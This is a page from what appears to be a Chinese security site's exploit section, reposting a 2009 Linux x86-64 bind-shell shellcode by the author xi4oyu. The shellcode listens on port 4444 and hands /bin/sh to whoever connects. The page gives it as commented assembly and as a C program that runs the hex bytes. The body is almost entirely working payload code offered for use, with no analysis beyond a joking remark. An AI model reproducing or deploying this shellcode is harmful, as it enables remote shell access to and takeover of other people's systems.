首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86-64 bindshell(port 4444)
来源:http://hi.baidu.com/xi4oyu/blog 作者:xi4oyu 发布时间:2009-05-18  

写的很2B的一个bindshell 不过是64位的,哈哈

/*
linux/x86-64 bindshell(port 4444)


BITS 64
xor eax,eax
xor ebx,ebx
xor edx,edx

;socket
mov al,0x1
mov esi,eax
inc al
mov edi,eax
mov dl,0x6
mov al,0x29
syscall

xchg ebx,eax ;store the server sock

;bind
xor rax,rax
push   rax
push 0x5c110102
mov [rsp+1],al
mov rsi,rsp

mov dl,0x10
mov edi,ebx
mov al,0x31
syscall

;listen
mov al,0x5
mov esi,eax
mov edi,ebx
mov al,0x32
syscall

;accept
xor edx,edx
xor esi,esi
mov edi,ebx
mov al,0x2b
syscall

mov edi,eax ; store sock
;dup2
xor rax,rax
mov esi,eax
mov al,0x21
syscall

inc al
mov esi,eax
mov al,0x21
syscall

inc al
mov esi,eax
mov al,0x21
syscall

;exec
xor rdx,rdx
mov rbx,0x68732f6e69622fff
shr rbx,0x8
push rbx
mov rdi,rsp
xor rax,rax
push rax
push rdi
mov rsi,rsp
mov al,0x3b
syscall

push rax
pop rdi
mov al,0x3c
syscall
*/

main() {
        char shellcode[] =
        "\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2"
        "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c"
        "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05"
        "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89"
        "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f"
        "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21"
        "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
        "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89"
        "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05";
       

        (*(void (*)()) shellcode)();

 

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Basic differences between x86
·PHPenpals <= 1.1 (mail.php ID)
·httpdx <= 0.5b FTP Server (USE
·Microsoft IIS 6.0 WebDAV Remot
·ClanWeb 1.4.2 Remote Change Pa
·freebsd/x86-64 execve /bin/sh
·Dana Portal Remote Change Admi
·Audioactive Player 1.93b (.m3u
·OpenSSL <= 0.9.8k, 1.0.0-beta2
·Harland Scripts 11 Products Re
·Zervit Webserver 0.04 (GET Req
·Audioactive Player 1.93b (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved